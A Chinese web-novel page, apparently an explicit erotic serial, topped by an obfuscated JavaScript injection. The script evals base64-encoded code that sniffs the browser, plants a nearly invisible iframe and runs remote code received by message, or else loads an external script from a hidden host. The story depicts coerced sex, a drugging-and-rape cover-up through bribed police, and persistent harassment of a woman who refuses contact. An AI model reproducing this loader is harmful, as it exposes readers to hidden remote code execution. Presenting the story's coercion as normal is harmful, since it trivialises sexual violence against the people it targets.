攻略学霸1v1_知乎廖医生小说

撩妹情话 撩妹套路 2021-02-22 14:09:05 8 0
eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
快捷c作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完,想下次继续接着阅读,可使用上方 ;amp;quot;收藏到我的浏览器;amp;quot; 功能 和 ;amp;quot;加入书签;amp;quot; 功能!侯龙涛陪着施雅在一间小会议室里,施雅可坐不住,来回来去的绕着椭圆的会议桌转圈儿,“他们怎么还没问完啊?龙涛,你去看看吧。”“你呀,安安稳稳的坐一会儿,转的我头都晕了。我早跟你说了,话儿我都垫到了,不会有事儿的。”会议室的门开了,王刚走了进来,把一叠卷宗往桌上一扔,看着施雅,“你这个儿子可真是死心眼儿,虽然承认了下药迷倒受害人,可一说到迷j的过程,他就装傻,怎么问也是不记得了。”“反正你们也不是真的要抓他,不是吗?”施雅先看了看王刚,又看了看了侯龙涛。侯龙涛过去打开了卷宗,看了一遍,“有这些,再加上人证、物证,也够定他罪的了吧?”“那倒是足够了。”“那不就得了,你存着吧。”施雅听了两个男人的这段对话,可有点儿急了,从椅子上蹿了起来,一把抓住侯龙涛的衣袖,“龙涛,你不是说就是走走形式,装装样子吗?”“你急什么?”侯龙涛向王刚使了个眼色,王刚便拿着卷宗出去了,侯龙涛则抱住了女人,双手捏在她的p股上,“我让他们审你儿子,就是为了要给他个教训,让他以后不敢再胡作非为。”“那你为什么让他们把卷宗留下?”“你以为这些警察光要钱不要命啊?他们给我办的事儿要是东窗事发,那可不是开玩笑的,他们当然要留条后路了。从陈倩报案,到调查取证,以及将来的任何后续侦查工作,他们都会留底儿,虽然不入档案,但万一你那个不懂事儿的儿子把事情搞砸了,他们还可以有补救的余地。”“你是说?”“对,再把他抓起来,就说是在文件处理的过程中出了失误,延误了办案,就算受点儿处分也不会很严重。”“那小龙岂不是还没完全脱险?”“哇,你还不知足?要是换了别人,连这样的机会都不会有的,只要他不胡说八道,不就什么事儿都没有,这也就是为什么我坚持一定要他马上就出国。”“你有把握能劝得动她们姐妹?”“当然了,小曦爱我爱得发疯,有哪个爱我的女人能拒绝我的要求?就像你,我就算现在要在这儿和你做a,你也不会拒绝的吧?”侯龙涛说着就一提捏着女人p股的双手,将她一下儿举到了桌子上。“唉呀,你别闹了,不可以在这儿的。”施雅惊慌失措的推着男人的身体。“哈哈哈,我就是开个玩笑,知道你现在也不会有心情的。”侯龙涛退后了两步,“走吧,去接你的宝贝儿子,他可以回家收拾行装了。”侯龙涛开着雅阁,施雅坐在副座上,后座上的施小龙还是惊魂未定,“涛哥,谢谢你了,我还以为今晚就走不了了呢。”“你不用谢我,我要不是怕你妈伤心,我才懒得管你呢,你也这么大了,就让她省省心吧。”“龙涛,还是要谢谢你的。”施雅感激的看了男人一眼…第二天上午不到10:00,侯龙涛和施雅就把施小龙送到了首都机场,在大厅的售票处买了一张12:10直飞巴黎的机票。女人紧紧的拉着儿子,她已经是泪流满面了,“小龙,你一到就要给我打电话啊…你爸爸会去机场接你的…我过一段时间就去看你…”“妈,我知道了,我一到就给你打电话。”到了这种时候,就连施小龙这个混小子也有点儿哽咽了。“小龙…到了那边…没有妈妈照顾你…你一定要听爸爸的话…好好上学…不要…不要再惹出事儿来了…好好做人…妈妈在…在家等你…等你回来…”施雅实在是说不下去了,把头扭向了一边。“妈,你放心吧,我…我…妈…”施小龙扶过母亲的脸庞,为她擦拭上面的泪水,自己却也哭了起来。眼前的一幕,使侯龙涛想起了当年自己的母亲送自己上飞机前,不也是如此的恋恋不舍吗,他暗暗叹了口气,可怜天下父母心啊。虽然是觉得有点儿对不住施雅,但对施小龙却是没有些许的同情,自从第一次在西单民航营业厅前见到他吻陈倩的那一刻起,侯龙涛就已经“宣判”了他“流放”的命运。男人看了一眼表,走过去分开了抱在一起的母子俩,“快进去吧,还有很多的手续要办呢,会来不及的。”“涛…涛哥,你…你帮我照顾我妈妈…”“我会的。”侯龙涛心中一笑,“我会继续在床上好好的‘照顾’她的。”儿子的身影终于从视线中消失了,施雅一下儿投入了男人的怀里,“龙涛…”侯龙涛抚摸着他的头发,轻声安慰着。其实把那个小混蛋送走,未尝不是件好事儿,苦闷的留学生活也许真的能使他成熟起来呢。两个人从停车场取了车,是那辆克莱斯勒。车子开上了机场高速,施雅一句话也不说,只是盯着窗外的天空,断断续续的抽泣。侯龙涛赶走了施小龙,对收服陈氏姐妹又是成竹在胸,他现在的心情很不错,可不想被施雅给搅和了。他把车停到了高速上的紧急停车带,解开了自己裤子的拉链儿…第六十三章完第六十四章 计中有计(七) 2/8/2003“怎么了?车出毛病…”克莱斯勒都已经在高速上停了有小一分钟了,施雅才反应过来,转头想问问是怎么回事儿,可话只问了一半儿就说不下去了,发现身边的男人正捋着从裤子里“钻出”的“大蛇”,还用火热的眼神看着自己,“你…你这是干什么啊?”侯龙涛微微一笑,伸手按开了女人的安全带,然后揽住她的后脖梗,往自己的跨间拉,“来吧。”“什么啊?干什么?”施雅的身子尽力向后仰着。“哼哼,用你的小嘴儿帮我服务一下儿吧,你的口交技术是属于相当不错的一类里的。”“别闹了,我…我没心情,你也太…太不顾我的感受了,快开车吧。”女人说着就又要哭出来了。男人能感到施雅抗拒的力量,他也不再用劲儿,打开自己的安全带,把身子倾了过去,搂住女人的肩膀,左手轻轻隔着裤子在她的大腿外侧抚摸,吻了吻她的嘴唇儿,“我知道你的心情很不好,我就是因为理解你,才一定要你服侍我。”“我不明白。”“我知道你不放心小龙,你舍不得他,但他是去上学了,还有他爸爸在那边照顾他,他一旦学业有成就会回来的,短短的四、五年时间,对于他未来的事业和发展来说,是一个很小的代价,再说以你的经济实力,每隔一两个月就可以去看他,他要是不急着毕业,每个寒暑假还都可以回来,你没必要难过的。”“这些我都知道,但我…我满脑子都是小龙,他长这么大从来没离开过我。”“呵呵呵,对啊,做母亲的嘛,就算是没必要的担心,也没人能责怪你的。但看着你被没必要的忧虑所困扰,而不想办法为你排解,那就不是一个好情人了。”侯龙涛的左手c进了女人微分的双腿间,用手掌压住了她的,猛的揉了起来。“啊…啊…你…嗯…”“为了让你忘却和儿子暂时分离的忧伤,我要用我的大j巴把你的身、你的心都填满,第一步当然就是填满你的小嘴巴了。”“不…不可以…啊…”施雅口中拒绝着,双手却撑到了座椅上,将p股抬了起来,这样悬空儿,便于男人的手在自己的跨间大面积的搓动。侯龙涛这次不再使用温柔的手段,而是一下儿就挑出了女人的香舌,拼命的吸吮,大拇指用力的按在她y蒂的部位,另外的四根手指向里抠,在她的g门和小x之间快速的来回滑动。“啊…啊…”施雅的身体在颤抖,她紧闭着眼睛,舌头根儿处有犹如即将断裂般的疼痛,加上下t传来的s痒,足以让脑神经麻痹了。侯龙涛放开女人的舌头,把她留出的口水舔乾净,然后就不再猥亵她的下身了,而是坐正了身子。“啊…别停啊…”施雅抱住了男人的胳膊,眼中尽是y欲的火焰。“哼哼,先满足我一次,我自然会让你爽上天的。”侯龙涛一把将她的头按在了自己的裆部。“唔…”施雅也再不推拒了,一口叼住了直立的yj,一上来就发力的上下套弄,连平时口交时的温柔舔舐都省了,她知道自己活动的越快,男人得到的快感就越强,自己口腔中的感觉也就越强,她要用疯狂的性j来使自己麻痹,使自己忘却心中的思念。侯龙涛一阵得意,施小龙现在大概正在候机大厅里哭呢,自己却把老二c进了他妈妈的檀口里,这种感觉和最初一边c干他妈妈,一边痛苦的想像他是如何玩弄陈倩时的感觉,那可真是天壤之别啊。男人看了一眼后视镜,一脚跺在油门儿上,克莱斯勒再次蹿上了高速公路。施雅一直在使用“深喉”的技巧,不知为什么,给这个年青的情人口交越来越困难了,记得刚和他好的时候,只要用一直手攥住r棒的底端,自己的喉咙就不会怎么“受苦”,可现在,除了那个大g头儿,还有一小段yj都挤进了自己咽喉里。她也曾怀疑过侯龙涛的老二在不断长大,可每次都没来得及问,就被干的死去活来了,等一觉醒来,就不记得要问了。施雅知道,虽然大小并不能决定一切,但他本来就很持久,恢复能力又强,现在再加上个头儿,自己真的是没什么好抱怨的。没几分钟,车就开到了高速上的收费站,侯龙涛有点儿爽糊涂了,等到他交费的时候才想起没有事先准备好钱。他左手按了一下电动车窗的按钮,然后就挺起身,开始从西裤的p兜儿里向外掏钱包儿,“对不起,对不起,稍等一下儿。”施雅也只能把嘴里的东西吐了出来,但右手还是飞快的捋着r棒。本来因为车窗是贴着黑膜儿的,如果只开一条缝儿,交了钱就走人的话,外面的人是无法看清车里的情况的,可pt cruiser的电动车窗是那种按一下儿就完全降落的,侯龙涛又急着找钱,忘了再按一下儿电钮止住它。这么一来,车里所发生的一切就都毫无保留的暴露给了收费员。那个收费员是个二十出头儿的女人,长得还真有几分姿色。车窗一开,她先是听到了一阵浪荡的“唔唔”声,紧接着就瞧见一个女人抬起了头,脸颊由于欲望而微微发红,眼神也是迷迷茫茫的。收费员稍稍欠了一点儿身,一根高耸的yj就映入了她的眼帘,“啊!”她吃惊的轻叫了一声。侯龙涛已经坐好了,刚从钱包儿里取了十五圆儿,听到女人的叫声,转过头来,看到她一脸奇怪的表情,“怎么了?”“流氓。”收费员小声的嘀咕了一句。“噢噢,”侯龙涛意识到她是看见了施雅给自己口交的行为,尴尬的一笑,“不好意思。”“少废话,交钱吧。”女人鄙夷的看了他一眼,手几乎都伸进车窗里了,一把抢过那十五块钱。“嗨!”侯龙涛就像示威一样,一等挡路的护拦抬起,就再次将施雅的脑袋按了下去,当着那个收费员的面,让她继续吸吮自己的r棒,“少见多怪,没见过这么大的j巴啊?”说完就开着车扬长而去。“你大爷,流氓,神经病。”收费员探出脑袋,冲着远去的克莱斯勒大骂了两句。“出什么事儿了?”后面一辆车的司机奇怪的问。“没事儿。”女人没好气儿的答了一句,突然想起什么似的,抬头瞧了一眼,在窗子的上面有一个保安摄像头。又开了六、七公里,侯龙涛不想再忍了,但又怕自己s精的时候控制不住方向盘,前方正好儿有一个出口儿,他就把车驶入了附路,接着就开进了路边一片看似人迹罕至的小树林。就在这时,施雅也使出了自己绝招,用喉咙钳住男人的g头,紧接着喉咙粘膜就是一阵起伏蠕动。“啊…”侯龙涛低吼了一声,狠狠的踩住了刹车,yj开始间歇性的抖动。他的双手是握在方向盘上的,还系着安全带,又有心理准备,身体只是向前晃了晃。施雅可就惨了,身子向前一冲,正在喷发的r棒脱出了她的檀口,大量的jy不光进入了她的食道,还s了她一脸。男人飞快的下了车,转到副驾驶的一边儿,拉开了车门儿。施雅还没起来呢,正用手将面颊上的jy往嘴里抹,脸上带着埋怨,“你…你真是的,不能好好停车啊?”侯龙涛“嘿嘿”一笑,把她也拉下了车,紧接着又把她塞进了后座。侯龙涛让施雅展开双臂,抱住两个前座上的头枕,双腿贴住椅背儿,上身下压。他坐到女人身后,伸出一只手,抚摸着那一瓣因为向后撅,而被女装裤裹的紧紧的p股,五根手指稍稍加力,就陷入了柔软的臀r里,再漂亮的女人,如果臀部上没r,玩儿起来也不会太有感觉的。男人的另一只手也不闲着,伸出两根手指,顶住了施雅的两片大y唇,快速的揉搓,“咕叽、咕叽”的水声随即响起,“好家伙,都湿成这样了,你是漏了还是怎么招?裤子全透了,难不难受啊?我帮你脱了吧?”“快脱…快脱啊…”施雅早就忍不住了,有节奏的用p股在空中画着小圆圈儿。“好一个深闺冤妇啊。”侯龙涛在心里感叹了一句,只要自己搞的她春潮泛滥,就不怕她会因为想念儿子而做出不利于自己“迎娶”陈氏姐妹的举动。侯龙涛解开了女人的裤扣儿,双手c入了她内k的裤腰里,猛的向下一拉,就将内k连同女装裤一起扒到了她的腿弯下,这才看清,泉涌般的y水儿已经在雪白的大腿上形成了两道清澈的溪流,从女人下t散发出浓郁的性味儿,那种味道是和年轻姑娘的芳香截然不同的,是完全熟透了的女子特有的、用来吸引异性的气味儿。男人被那种气味儿深深的吸引了,那种何莉萍、许如云和吴爱琳身上都有的气味儿。他一边用力的吸着气,一边伸长了舌头,从施雅的一条大腿内侧开始舔舐,经过深红色的y户,再到另一条大腿的内侧。男人突然的温柔并没讨到什么好儿,施雅一下儿就变得烦躁不安了,不断用p股向后拱着他的头,“快…快…不要…啊…不要再舔了…啊…快c…c进来啊…我要…”侯龙涛也知道她急,经过这么短短的几分钟,自己的老二也经重新恢复到了“临战”状态,那就没必要再拖延下去了。侯龙涛弓着身站了起来,虽说pt cruiser比一般的小轿车要高,但他的后背还是紧贴着车顶儿,他的双手c进了女人的上衣里,推开胸罩,用力的捏住了那两团如同棉絮般柔软的茹房,硬梆梆的yj向前一送,“噗哧”一声,尽根没入。“啊…”施雅满足的大叫了一声,然后立刻就收住了声音,她意识到这不是在自家的卧室里。满足只是暂时的,因为她的身体被夹在两个座椅之间,又被男人从上面压着,根本就动弹不得,又赶上这个“死”情人最爱一动不动的感受女人yd本能的收缩,她可真是有点儿急了,小声的催促道:“动…动一动…老公…嗯…你倒是…倒是c我啊…”“那我就来了。”侯龙涛开始迅速的抽c起来,因为后背是贴着车顶儿的,说是抽c,其实p股移动的幅度非常的小,但这样却一点儿也不影响两人所得到的快感。侯龙涛的腰腹力量很足,就算yj只向后退出一点点,撞击zg的力量也毫不减弱,“吱吱”、“噗哧”、“咕叽”,各种y荡的声音还是从两人交和的性器间不断发出。“唔…嗯…嗯…”施雅咬着自己的一根手指,拼命的忍着不发出声音,男人jy自己的速度超出了自己的想像,娇嫩的zg简直快被撞烂了,yd里的膣r都来不及细细的品味被磨擦的快感,就已经接近于麻痹了。清纯女孩儿娇羞无限的样子是侯龙涛的最爱,成熟美妇y荡s浪的样子也是他的最爱,但像施雅现在这个样子,明明是个熟女,想叫却又不敢叫,一点儿都放不开,他就不太得意了。男人揉捏茹房的双手又加了两分力,“叫啊,叫出来,你越叫,我c你就越狠,大声叫,不会有人来的,除了我,没人会听到你发s时的浪叫的。”听了侯龙涛下流的话语,女人睁开了眼睛,四周都是树影重重,只有在正前方很远的地方能隐隐约约的看到一片红砖房,大概是个小村庄,这里已经远离公路了,连车声都听不到,静悄悄的,也许真的不会有人来吧。施雅放开口中的手指,张开了小嘴儿,一连串儿的y声浪语就此而出,“老公…啊…用力…用力c啊…我的r…茹房要被你…啊…捏爆了…啊…啊…小x…小x要…啊…要坏掉了…爽…爽死了…”她一旦叫出来了,就再也停不住了,从她声嘶力竭的喊声中,旁人是很难猜出她其实是在享受。侯龙涛果然不食言,大腿撞击女人丰满p股的“啪啪”声更加的紧密了。他也不用换什么花样儿,一直就这样搞了下去,姿势在精不在多。由于两个人在车里的疯狂交媾,如果从外面看,克莱斯勒一直是在不停的振动,这种振动持续了很久,在毫无预兆的情况下,突然间就嘎然而止…“醒醒,到家了。”侯龙涛伸手拍了拍身边女人的脸蛋儿。“嗯…”施雅揉了揉眼睛,昨晚就没睡好,刚才又被狠狠的c了一顿,坐在车上不知不觉的就睡着了。“你自己上去吧。”男人探过头去,吻住了她的嘴。“唔…”施雅把情人的舌头迎进了嘴里,用自己的舌头和它搅动了一会儿,“你跟我上去吧,我给你做午饭。”“不了,你下午还得上班儿呢,而且我现在就要去找陈倩她们,那件事儿越早了结越好,夜长梦多。”“那你要及时通知我啊。”“放心吧,一有结果或是有什么变化,我就会打电话给你的。”“谢谢你…”“傻瓜,还跟我说这种见外的话。”侯龙涛的左手隔着衣服捏住了女人的茹房,“虽然你儿子出国了,还有我陪你呢。”施雅也想说几句情话,可一张嘴就是“啊”的一声痛叫,“你…你轻点儿捏。”“啊,我忘记了。”男人这才想起这对儿乃子已经被自己抓的青一块儿紫一块儿了。侯龙涛看着施雅上了楼,这才向着公主坟的方向开去。虽然今天是星期六,但由于春节倒休的关系,各个机关单位都已经开始上班了,所以陈倩和她的父母自然都不会在,只留下了还在放寒假的陈曦一个人在家。到了楼下,侯龙涛先给陈曦的手机拨,没有开机,他又拨通了女孩儿家的电话。“喂。”电话铃儿响了两声之后,一个略带忧郁的声音从听筒的另一头儿传了过来。“小曦,是我啊。”男人用比较沉重的语气做开场白。一阵沉默之后,陈曦终于开口了,“有事儿吗?”虽然她尽量把语气放得很平缓,但还是能听出些许的颤音儿。“我知道你家现在没人,我能上去吗?”“不可以。”“啪!”电话被挂断了。侯龙涛接着再打,不过直到变成了占线音,女孩儿也没有再接。男人并没就此放弃,一遍又一遍的按着重拨键,每次都是等到占线音出现。他的脸上是有笑容的,他知道陈曦还是舍不得自己,要不然她早就把电话线拔了。“你有完没完!?”经过十几次尝试,不懈的努力最终有了回报。“小曦,我爱你,我爱你,你不听我解释,我就一直打下去,反正我无事可做。”侯龙涛分明是在耍无赖,但却把语速放得很慢,听起来就多了几分真诚。“你…你…你再打我就报警了,告你s扰。”“好,你告吧,为你坐牢,我心甘情愿。”“你…你…”“小曦,我就在楼下,我要上去见你,你不给我开门,我就一直在楼道里喊‘侯龙涛爱陈曦’,你不想让我搅得四邻不安吧?我现在就上去了。”“不…不要,我不会给你开…”连女孩儿的话都没听完,侯龙涛就把手机挂了,蹦下了车,小跑着进了陈曦家的楼道。上了楼,女孩儿家的大门是虚掩着的,侯龙涛微微一笑,走了进去,反手就把门撞上了。陈曦就坐在客厅里的方桌后,看到男人进来,立刻把头扭向一边儿,“有什么话你就快说,说完了就请你离开,我还有很多事情要做呢。”其实她从昨天到现在,想的都是侯龙涛,哪儿有心情做别的事儿啊。“小曦…”侯龙涛走到女孩儿身后,扶住了她的香肩。当男人的手一碰到自己的身体,陈曦猛的晃了晃肩膀,把它们甩开了,自己也站起了身,双臂抱在胸前,走开了几步,用背对着男人,“你到底有没有事儿?”侯龙涛猛的向前一冲,一把从背后抱住了女孩儿,吻住了那雪白的脖子,“小曦,我爱你,我爱你…”“啊…”陈曦的身体先是一僵,然后就变得软绵绵的,靠到了男人的怀里,“涛哥…我也爱你…嗯…”女孩儿扭回头,闭上了眼睛,把香唇献了出来。侯龙涛真是喜出望外,没想到毫不费力的就打动了女孩儿,赶忙把嘴凑了过去。就在这时,陈曦忽然睁开了眼睛,猛的挣脱了男人的怀抱,“不…不可以,涛哥,不可以的…”“怎么了,小曦?”“不,我不会再被你的花言巧语所骗的。”“小曦,我不是骗你啊,我是真的爱你。”侯龙涛并没对女孩儿的突然翻脸而感到失望,本来就预料到了不会这么简单的。“你爱我姐姐吗?”“爱。”“那,另外那五个女人呢?你也爱她们吗?”“爱。”“你谁都爱,那又跟你谁都不爱有什么区别呢?”陈曦大叫了一句,委屈的哭了出来。“小曦,你要我怎么样,才肯相信我呢?”侯龙涛紧皱着眉,一脸的焦急与无奈。“我要你和那些不三不四的女人分手,我要你只爱我一个人。”“小曦,”男人向后退了两步,缓缓的摇了摇头,“不可能的,我对你们的爱是没有偏重的,她们把身心都交给了我,我不能对不起她们。”“那你就能对不起我吗?我一样把身心都交给你了。”“其他女人从来没有反对过我追求你们姐妹俩,为什么你不能接受她们呢?”“不,我不能接受。你要是真的爱我,你就离开她们。”“小曦,除了这个要求,我什么都可以答应你的,哪怕是要我为你去死,去上刀山下油锅,我也决不会眨一下儿眼的。你知道我是真的爱你,我把你看的比生命都重要。”“呵呵,”女孩儿笑的好苦,“姐姐说的一点儿错儿也没有,男人的话最不值钱。”“什么意思?”侯龙涛一时没明白过来。“为我死?为我上刀山下油锅?我比你的生命都重要?你说这些有什么意义?要是在一天前,你对我说这些,我一定会好高兴的,可现在…”“现在怎么了?”“现在我知道你是个骗子,感情骗子,除了你自己,你谁也不爱。”陈曦一把推在男人的胸口,把他往门口儿赶,“你不是要死吗?你去死好了。”“小曦,你干什么?”侯龙涛只稍稍用了一点点力量反抗,任由女孩儿把自己推了出去。“你滚,你滚,我恨你,我永远都不要再见到你…”陈曦冲着关上的大门喊了起来,然后一转身,后背靠住了门,缓缓的滑坐到地上,把脸颊埋进了双膝间,再也抑制不住,“呜呜”的哭了起来,“我恨你,你去死,我恨你…”“唉…”侯龙涛叹了口气,叼上一根儿烟,他的心里一点儿也不比陈曦好过。心疼归心疼,该做的事儿还是得做,已经从妹妹这边儿得到了想要的结果,明天再去姐姐那里“传达”,应该就差不了太多了…第六十四章完第六十五章 计中有计(八) 2/9/2003-2/18/2003第二天上午,刚过11:00,侯龙涛就从办公室溜出来了。虽然他早已派人摸清了陈倩上班时的作息时间,知道她每天过了12:00才会和同事一起出来吃午饭,但侯龙涛还是很早就到了,坐在车里“守株待兔”。等了很久,终于看到三个互相挽着胳膊的年轻女子从民航营业大厅里走了出来。因为天气的缘故,她们依偎在一起,长大衣都裹得很紧,领子竖着,大衣的下摆下露出三双一模一样的黑色高跟鞋和六段穿着r色丝袜的小腿,一看就是没把制服换下来,最右边的那个就是陈倩了。侯龙涛整了整衣服,按下了sl500的车窗,探出头来,“倩倩,”等到三个女人回过头来,他已经关好了窗户,下了车,“上车吧,咱们谈谈。”陈倩的脸上露出一丝厌恶,根本没理男人,挽着同事胳膊的手臂紧了紧,“快走吧,不用理他。”“他谁啊?”两个同事都好奇的问,毕竟那个男人长得还挺精神的,开的又是一辆很扎眼的benz,可看陈倩的反应,好像是对他充满了敌意。女人的天性就是打探别人的隐思,尤其是男女之间的事情,两人脚下的步伐不快反慢,连寒冷也顾不得了。侯龙涛三两步就追了上去,一把拉住陈倩的一条胳膊,“倩倩。”陈倩本来想甩开男人继续走的,可两个同事都已经停住了脚步,她也只好站住了,但还是从男人的手中夺出了手臂,“干什么?”“咱们找个地方谈谈吧。”男人是一脸的愁容,又一次拉住了她的手腕儿。“咱们没什么好谈的,”这次男人的手使上了劲儿,就像是一把钳子一样,陈倩挣扎了几下儿都没能脱身,“你…你放开我啊。”“不,你不听我说,我就不放你。”“你…你…不要脸,再不放开,我要喊了。”“你喊吧,我现在是什么都不在乎,心爱的女人恨得我要死,我还要什么脸面啊。”在大庭广众之下被一个男人纠缠,毕竟不是什么光彩的事儿,有几个路人已经投来了好奇的目光。陈倩的脸上一热,只好做出了让步,“那你说吧,快点儿。”“真的要我在这儿说?”侯龙涛放开了女人的手腕儿,瞧了一眼那两个同事。“这…”对于男人要说什么,陈倩是有那么一点儿预感的,但又不能完全确定,万一他要是说出了关于前天晚上的事儿,那自己可丢不起这个人,“就去你的车里吧。”她又对同事说:“你们先去吧,我马上就来。”“好吧。”那两个女人转身离开了,一边走还在一边小声儿的议论。一上车,侯龙涛就把昨天对陈曦说的那一套可以为她付出生命的话又对陈倩说了一遍,但他确实是用了真情的,说的如泣如诉,要是换了一个不知道他花心历史的女人,一定会被他感动的。可陈倩只是鄙夷的“哼”了一声儿,既不出声儿,脸上也没有表情。“倩倩,你说话啊。”“你说完了?”“说完了。”“那我可以走了吧?”陈倩说着就要开车门儿。“等等。”侯龙涛眼疾手快,赶紧拉住了女人的大衣,“你就真的一点儿都不动心?”“你好无耻!”女人回过头来,一脸的愤怒。“怎…怎么了?”侯龙涛“无辜”的看着她。“我一直都以为你很聪明,受过高等教育,现在居然把同一套花言巧语用在两个住在一起的女孩儿身上。”陈倩的语气里带着些许嘲笑的意味。“小…小曦她告诉你了?”男人大吃一惊,其实小曦要是没说,他才真的吃惊呢。“人算不如天算,你挖空心思想把我们姐妹俩骗到手,可实际上却一点儿也不了解我们,我和小曦从小就是无话不谈,她又怎么可能不把你昨天的无赖行径告诉我呢。”陈倩扥出了攥在男人手里大衣,打开车门儿,自行离开了。“倩倩,”侯龙涛也下了车,还想追,“我说的都是真心话,就算是对你们姐妹两个人说的都一样,那也是因为我对你们的感情是相等的啊。”“你省省吧,我们决不会再相信你了。”女人连停都没停,头也不回的走了。等陈倩的身影消失在了拐角处,男人回到了车上,掏出手机,先给施雅打了一个,告诉她陈氏姐妹已经答应了不再追究那件事儿,唯一的要求就是永远也不要再和施小龙或是施小龙的家人打交道,只求平静的把一切都忘记。侯龙涛的第二个电话只有一句话,“一切都按原计划,细心点儿。”…陈倩走进了西单的麦当劳,两个同事赶忙招呼她,“这儿,快来,东西都要好了。”“要好了?”陈倩不想让刚才的事儿搅了同事们的心情,换上了一副笑脸儿,“你们给过钱了?”“给过了,我们请你。”“喂,你们有什么企图啊?”平常她们都是各付各的。“快坐,快坐,”其中的一个女人搂住了陈倩的肩膀,“刚才那个人是谁啊?”陈倩早料到她们会问的,也没什么好隐瞒的,都是天天见面的朋友嘛,“以前认识的一个人。”“他在追你?”“嗯。”“你不要他?”“不要。”“真的?”“真的。”“为什么呀?”“不喜欢呗,还能为什么?”“切,不说就算了。”那个同事装作生气,撅起了小嘴儿。“我不是说了吗?”“好好好,那你现在的那个男朋友,叫什么来着?施小龙,对,施小龙,你喜欢他什么啊?”“我…我已经和他分手了。”陈倩一听人提起那个小混蛋,立刻沉下了脸,她本来就不是真的爱施小龙,知道了他对自己有不良企图之后,一下儿就变得非常讨厌他。“分手了?什么时候的事儿啊?”“就前两天。”“那就更不合理了,你对刚才那个人